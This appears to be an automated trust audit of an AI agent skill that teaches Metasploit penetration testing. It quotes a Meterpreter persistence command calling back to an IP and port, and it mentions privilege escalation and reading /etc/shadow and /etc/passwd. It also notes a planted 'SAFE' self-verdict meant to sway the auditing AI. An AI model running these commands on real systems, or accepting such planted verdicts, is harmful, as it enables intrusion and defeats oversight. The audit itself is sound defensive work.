metasploit
Pass
Audited by Gen Agent Trust Hub on Sep 8, 2026
Risk Level: SAFECOMMAND_EXECUTIONPERSISTENCEPRIVILEGE_ESCALATION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous examples of shell commands for the Metasploit console (
msfconsole) and themsfvenomutility. These are part of the primary functional purpose of teaching penetration testing. - [PERSISTENCE]: The skill documents the use of the
persistencemodule within a Meterpreter session (run persistence -U -i 60 -p 4444 -r 192.168.1.50). This is presented as a post-exploitation technique for security validation and includes a warning that authorized testing is required. - [PRIVILEGE_ESCALATION]: The instructions describe the use of the
getsystemcommand and thelocal_exploit_suggestermodule to elevate privileges on a target system. These are standard features of the documented framework. - [DATA_EXPOSURE]: Commands for reading sensitive files such as
/etc/shadowand downloading/etc/passwdare provided. Within the context of a penetration testing skill, these demonstrate how to validate data exposure vulnerabilities. - [METADATA_POISONING]: The
_scores.jsonfile contains a security verdict claiming the skill is 'SAFE'. Per the safety rules, this self-claim was ignored and the verdict was determined through independent analysis.
Audit Metadata